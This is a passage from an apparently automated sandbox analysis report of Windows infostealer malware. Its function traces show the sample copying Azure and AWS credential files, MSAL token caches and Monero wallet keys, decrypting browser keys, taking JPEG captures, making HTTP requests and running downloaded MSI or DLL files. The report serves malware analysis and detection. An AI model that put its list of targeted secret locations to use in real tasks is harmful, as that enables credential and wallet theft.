                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E8426
                                    • wsprintfA.USER32 ref: 000E8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E8499
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s
                                    • API String ID: 3246050789-1643714437
                                    • Opcode ID: 1ab681ab0857d5091a78c7468fdb9eab9f5e89da8d4df52f5cb1c0e3636ad9dc
                                    • Instruction ID: 75f08afd5ddfe863e022840b8706ee9ff90b428cf286d07a70327f73669b13a9
                                    • Opcode Fuzzy Hash: 1ab681ab0857d5091a78c7468fdb9eab9f5e89da8d4df52f5cb1c0e3636ad9dc
                                    • Instruction Fuzzy Hash: E7812A71911158AFEB25DB51CD91FEAB7B8BF08700F00C299E109A6191DF706B89CFA1
                                    Function 000E4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 000E4DCD
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E492C
                                      • Part of subcall function 000E4910: FindFirstFileA.KERNEL32(?,?), ref: 000E4943
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 000E4E59
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FDC), ref: 000E4971
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FE0), ref: 000E4987
                                      • Part of subcall function 000E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4B7D
                                      • Part of subcall function 000E4910: FindClose.KERNEL32(000000FF), ref: 000E4B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000E4EE5
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E49B0
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F08D2), ref: 000E49C5
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E49E2
                                      • Part of subcall function 000E4910: PathMatchSpecA.SHLWAPI(?,?), ref: 000E4A1E
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,00B812C8), ref: 000E4A4A
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,000F0FF8), ref: 000E4A5C
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,?), ref: 000E4A70
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,000F0FFC), ref: 000E4A82
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,?), ref: 000E4A96
                                      • Part of subcall function 000E4910: CopyFileA.KERNEL32(?,?,00000001), ref: 000E4AAC
                                      • Part of subcall function 000E4910: DeleteFileA.KERNEL32(?), ref: 000E4B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 341bd849c2252bd3168ec2866b035f3c2d951d037c605eb74d14fe9481118dd0
                                    • Instruction ID: cc51c6f4bc602323d61748b462f5fbd2824cd2c143891d0a83036a2fb2d48f34
                                    • Opcode Fuzzy Hash: 341bd849c2252bd3168ec2866b035f3c2d951d037c605eb74d14fe9481118dd0
                                    • Instruction Fuzzy Hash: 18418479A40208AAD710F760EC47FED3738AB64701F4048947349661C3EEB557C98B92
                                    Function 000E9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000E906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 7029c37f1c78dc3947a9656316a9d0fa19058dd9c04f53a13b26c4bad290164a
                                    • Instruction ID: 936781756f3e77d15ef015a2648e1d359292cbf766efd9f0aeae2966dbab59a8
                                    • Opcode Fuzzy Hash: 7029c37f1c78dc3947a9656316a9d0fa19058dd9c04f53a13b26c4bad290164a
                                    • Instruction Fuzzy Hash: 9D71E9B1A10608AFDB14DFE4DC89FEEBBB9BB4C301F108508F615A7295DB34A905CB61
                                    Function 000E2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E31C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E34EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 6e853a065cc53bdaf4278f5d78f8761d2d3e0138147884c08bd2bdb60f0bdb5e
                                    • Instruction ID: 7f04d6ba5b1feed1b68e60e8f72d6f5cbf2963675beecc7c5208e04e5e709205
                                    • Opcode Fuzzy Hash: 6e853a065cc53bdaf4278f5d78f8761d2d3e0138147884c08bd2bdb60f0bdb5e
                                    • Instruction Fuzzy Hash: 0B120C719001489EDB19EBA1DD92FEEB738AF19300F514169E50676193EF343B4ACFA2
                                    Function 000E52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D6280: InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
                                      • Part of subcall function 000D6280: StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6303
                                      • Part of subcall function 000D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
                                      • Part of subcall function 000D6280: HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
                                      • Part of subcall function 000D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
                                      • Part of subcall function 000D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5318
                                    • lstrlen.KERNEL32(00000000), ref: 000E532F
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 000E5364
                                    • lstrlen.KERNEL32(00000000), ref: 000E5383
                                    • lstrlen.KERNEL32(00000000), ref: 000E53AE
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 12a1224ff1e1da56410d0fc36910ba0479a6f557ed157eb73467ea8874a2d109
                                    • Instruction ID: 7813e7fcac679ad002ee449689380a575c4603f963950619d4471fc66f76409a
                                    • Opcode Fuzzy Hash: 12a1224ff1e1da56410d0fc36910ba0479a6f557ed157eb73467ea8874a2d109
                                    • Instruction Fuzzy Hash: 17512B30A10188EFDB14EF61CD92AED3779AF19305F514428E5067A593EF347B4ACB62
                                    Function 000E12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 8f350d5048e6b44c49027152e4ccc7cf584fdd261994c2a0dadaa5d212c110c7
                                    • Instruction ID: 35bdf7a0f085b2a7a0bd9ee98e84bd48cc7fac5da100b796922553ebddd6a515
                                    • Opcode Fuzzy Hash: 8f350d5048e6b44c49027152e4ccc7cf584fdd261994c2a0dadaa5d212c110c7
                                    • Instruction Fuzzy Hash: CBC193B5A0125D9FCB14EF61DD89FEE7378BB58304F004598E50AB7242DB70AA85CF91
                                    Function 000E4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E42EC
                                    • lstrcat.KERNEL32(?,00B808E8), ref: 000E430B
                                    • lstrcat.KERNEL32(?,?), ref: 000E431F
                                    • lstrcat.KERNEL32(?,00B7F028), ref: 000E4333
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000E8D90: GetFileAttributesA.KERNEL32(00000000,?,000D1B54,?,?,000F564C,?,?,000F0E1F), ref: 000E8D9F
                                      • Part of subcall function 000D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000D9D39
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E93C0: GlobalAlloc.KERNEL32(00000000,000E43DD,000E43DD), ref: 000E93D3
                                    • StrStrA.SHLWAPI(?,00B80A68), ref: 000E43F3
                                    • GlobalFree.KERNEL32(?), ref: 000E4512
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
                                      • Part of subcall function 000D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
                                      • Part of subcall function 000D9AC0: LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E44A3
                                    • StrCmpCA.SHLWAPI(?,000F08D1), ref: 000E44C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000E44D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 000E44E5
                                    • lstrcat.KERNEL32(00000000,000F0FB8), ref: 000E44F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 8fb06d4481921b4fd4760d01a71ed884ff98b5d725124e3c5922ed3cd731ebcf
                                    • Instruction ID: 1e13e19820e7a36cd2beac22b787b3890f0967085b409de62c86603a9713cf53
                                    • Opcode Fuzzy Hash: 8fb06d4481921b4fd4760d01a71ed884ff98b5d725124e3c5922ed3cd731ebcf
                                    • Instruction Fuzzy Hash: 9C7147B6D00618ABDB14EBE0DC85FEE777DAB8C301F048598F605A7182DA34DB45CBA1
                                    Function 000D1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                                      • Part of subcall function 000D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                                      • Part of subcall function 000D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                                      • Part of subcall function 000D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                                      • Part of subcall function 000D12A0: RegCloseKey.ADVAPI32(?), ref: 000D12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 000D134F
                                    • lstrlen.KERNEL32(?), ref: 000D135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 000D1377
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 000D1465
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 000D14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: c1f55363047f6a4d3ee49fd3435e0a708a8c2822c177f3ed41cade7648dd8573
                                    • Instruction ID: 53db6755526fadccfebdf7b2c4b87f0e2fade6986d32acdb7eb5f498a1c80fdf
                                    • Opcode Fuzzy Hash: c1f55363047f6a4d3ee49fd3435e0a708a8c2822c177f3ed41cade7648dd8573
                                    • Instruction Fuzzy Hash: DB5156B1E101585BDB15FB61DD92BED733CAF58300F4045A8B60A72083EF306B89CBA6
                                    Function 000D75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000D72D0: memset.MSVCRT ref: 000D7314
